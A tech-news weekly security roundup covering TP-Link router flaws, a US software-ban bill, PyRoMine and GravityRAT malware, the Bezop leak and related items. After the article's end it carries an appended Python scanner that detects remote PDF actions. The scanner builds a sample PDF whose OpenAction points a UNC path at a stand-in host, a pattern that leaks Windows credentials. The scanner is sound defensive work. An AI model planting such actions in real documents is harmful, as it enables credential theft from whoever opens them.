Windows USB-stick-of-death, router bugs resurrected, and more

Your weekend guide to computer security cockups


Roundup Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week.

TPLink? More like TPwnedLink, amiright? Anyone?

Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes (CVE-2017-13772) were not only reported to TPLink in October 2017, but were vulnerabilities that the company had patched in older models, only for the bugs to resurface when the exploitable code was reused in newer units.

"Code reuse is a huge problem within the IoT industry," Fidus stated in its advisory. "In most cases, what we generally see is a company who sells devices with poor security to vendors who then brand them and sell them on. Tracking the original manufacturer can be quite difficult and, in our experience, getting such vulnerabilities patched is even harder."

The stack-overflow bugs can be exploited via the router's built-in HTTP web server, used to configure the device, to gain control of the unit. It appears an attacker has to be able to log into the equipment to leverage the programming blunders, so make sure you're not using the default credentials.

DiFi wants an express lane for banning software

Fresh on the heels of Uncle Sam blacklisting security company Kaspersky Lab from its computers, US Congress mulls streamlining the process of blocking particular software packages from being used on government networks and systems.

Senator Dianne Feinstein (D-CA) is putting her name on the Federal Network Protection Act, a bill that would give the Secretary of Homeland Security the ability to issue binding operational directives – strict orders, in other words – to remove software from federal networks without requiring that the vendor be notified first.

"We're seeing more and more attacks on federal computer systems by foreign agents, and we need to make sure we have all the tools and authorities necessary to block those attacks," Feinstein said.

"By clarifying what actions the Secretary of Homeland Security can take, we allow the department to act quickly in response to cyber threats."

PyRoMine fires up EternalBlue flaw to forge Monero

Another day, another pack of criminals finding new and creative ways to make a buck on cryptocoins.

This time, it's the creators of a horrible piece of malware called PyRoMine. It uses the compute power of infected Windows machines to generate Monero cryptocurrency for its controllers. What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits. Sounds scary, but as Mounir Hahad of Juniper Threat Labs told El Reg, both flaws have long since been patched by Microsoft. If you're infected via these exploits, you need to take a long hard look at yourself.

"EternalRomance and EternalBlue are only made eternal by our inaction," Hahad said.

"A patch to close the vulnerabilities that these exploits use has been available since before the WannaCry era."

Bezop says be-ware, we got be-reached

Elsewhere in the world of internet funbux, blockchain commerce biz Bezop is on the defensive after researchers at Kromtech disclosed that the upstart had exposed to the public internet a poorly configured MongoDB database containing the names, email addresses, hashed passwords, and scans of IDs and passports for 25,000 of its ICO backers.

Bezop says it's no big deal, as the incident actually occurred in January.

"If you remember, we reported a DDoS attack and a couple of security holes that unintentionally exposed user data such as name, wallet addresses, address on file, copies of identification documents, etc., and that they could possibly be in the public domain. That database has since been closed and secured."

We're sure the 25,000 people whose passport images were leaked out will find that very comforting.

Cisco smells a RAT

Cisco Talos researchers dished the dirt on GravityRAT, a software nasty targeting peeps in India. They say the malware was used to pull sensitive information from companies and organizations in the country for nearly two years before it was caught.

"GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT," Talos writes.

"This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor."

Quick links

MikroTik router owners must patch their devices' firmware to prevent miscreants from exploiting a flaw in a remote administration service to swipe a copy of the user database – it is already being leveraged in the wild by scumbags to commandeer affected hardware. Also, don't forget to secure access to your HPE iLO management interfaces for your servers: hackers are exploiting poorly defended networks to hold systems to ransom.

Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. Microsoft will not issue a patch for the programming blunder, we're told.

Medical transcription biz MEDantex leaked patient records for thousands of physicians online, according to investigative reporter Brian Krebs. Revenge porn web exchange Anon-IB was seized by Dutch police, who also collared five suspects related to the image-sharing site.

If you go traveling with your Mac, or leave it unattended around strangers, try out Objective-See's new Do Not Disturb app that thwarts evil-maid-style attempts to tamper with your computer or infect it with spyware.

Finally, Check Point warned that your Windows login details can be nicked by opening malicious PDFs that use remote document loading mechanisms to leak your credentials. ®
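As an added illustration of the kind of document feature Check Point is warning about (this is our own example, not Check Point's code, and the sample PDF it builds is constructed rather than a real lure), here is a small scanner that flags PDF actions whose target lies off the local machine. It assumes the credential leak works through actions such as /GoToR, /GoToE or /Launch whose /F entry names a UNC path or URL, so that merely opening the file makes the reader connect to an outside host; that assumption is ours, not a detail quoted from the report. The scanner also inflates FlateDecode streams, because an action tucked inside a compressed object stream is invisible to a plain grep.

```python
import re
import zlib

# Action types that make a reader open another document or resource.  The
# assumption (ours, not a detail from Check Point's write-up) is that the leak
# comes from one of these pointing at a UNC path or URL on an outside host.
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch|URI)\b")
# /F (...) or /URI (...) literal strings, allowing backslash escapes inside.
TARGET_RE = re.compile(rb"/(?:F|URI)\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
# One dictionary, allowing one level of nested << >> (e.g. /A << ... >>).
DICT_RE = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>", re.DOTALL)
# Stream bodies; FlateDecode ones are inflated so actions hidden in them are seen.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)

_ESCAPES = {b"n": "\n", b"r": "\r", b"t": "\t", b"(": "(", b")": ")", b"\\": "\\"}


def decode_pdf_string(raw: bytes) -> str:
    """Undo PDF literal-string escapes: \\\\ -> \\, \\( -> (, \\n -> newline."""
    out, i = [], 0
    while i < len(raw):
        ch = raw[i:i + 1]
        if ch == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            out.append(_ESCAPES.get(nxt, nxt.decode("latin-1")))
            i += 2
        else:
            out.append(ch.decode("latin-1"))
            i += 1
    return "".join(out)


def is_suspicious(action: str, target: str) -> bool:
    """UNC paths and file:/smb: URLs are flagged for every action type; for
    GoToR/GoToE/Launch any URL counts, while plain http(s) /URI links are
    ordinary hyperlinks and are left alone."""
    t = target.strip().lower()
    unc_like = t.startswith(("\\\\", "//", "file:", "smb:"))
    if action == "URI":
        return unc_like
    return unc_like or re.match(r"^[a-z][a-z0-9+.-]*://", t) is not None


def _candidate_blobs(pdf: bytes):
    """The raw file, then every stream body that inflates with zlib."""
    yield pdf
    for m in STREAM_RE.finditer(pdf):
        try:
            # decompressobj tolerates the trailing newline before 'endstream'
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue  # not a Flate stream (image data, plain text, ...)


def find_remote_actions(pdf: bytes) -> list:
    """Return (action type, decoded target) for each action aimed off-host."""
    findings = []
    for blob in _candidate_blobs(pdf):
        for d in DICT_RE.finditer(blob):
            body = d.group(1)
            act = ACTION_RE.search(body)
            if act is None:
                continue
            kind = act.group(1).decode()
            for tgt in TARGET_RE.finditer(body):
                target = decode_pdf_string(tgt.group(1))
                if is_suspicious(kind, target):
                    findings.append((kind, target))
    return findings


def build_sample_pdf(action: bytes, compress: bool = False) -> bytes:
    """Constructed sample, not a real lure: a skeleton PDF whose catalog
    /OpenAction is `action`, optionally stored inside a Flate stream (a real
    object stream also carries an offset table; the byte scan does not care)."""
    if compress:
        data = zlib.compress(action)
        obj4 = (b"4 0 obj\n<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(data)
                + data + b"\nendstream\nendobj\n")
    else:
        obj4 = b"4 0 obj\n" + action + b"\nendobj\n"
    return (b"%PDF-1.7\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
            b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
            + obj4 + b"%%EOF\n")


# Constructed action pointing at a TEST-NET address; in PDF syntax the UNC
# backslashes are themselves escaped, hence the doubled backslashes.
UNC_ACTION = rb"<< /S /GoToR /F (\\\\203.0.113.7\\share\\doc.pdf) /D [0 /Fit] >>"
BENIGN_ACTION = rb"<< /S /GoTo /D [0 /Fit] >>"

if __name__ == "__main__":
    for label, pdf in [("plain", build_sample_pdf(UNC_ACTION)),
                       ("flate", build_sample_pdf(UNC_ACTION, compress=True)),
                       ("benign", build_sample_pdf(BENIGN_ACTION))]:
        print(label, find_remote_actions(pdf))
```

Run it on a file with `find_remote_actions(open(path, "rb").read())`. The regexes deliberately work on raw bytes rather than a full PDF parser, so they miss targets written as hex strings or split across indirect file-specification objects; treat a hit as a reason to look closer, and an empty result as no more than a first pass. The same idea, applied at the network edge, is simply to block outbound SMB from workstations so that a reader that does follow such a reference has nowhere to send the credentials.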
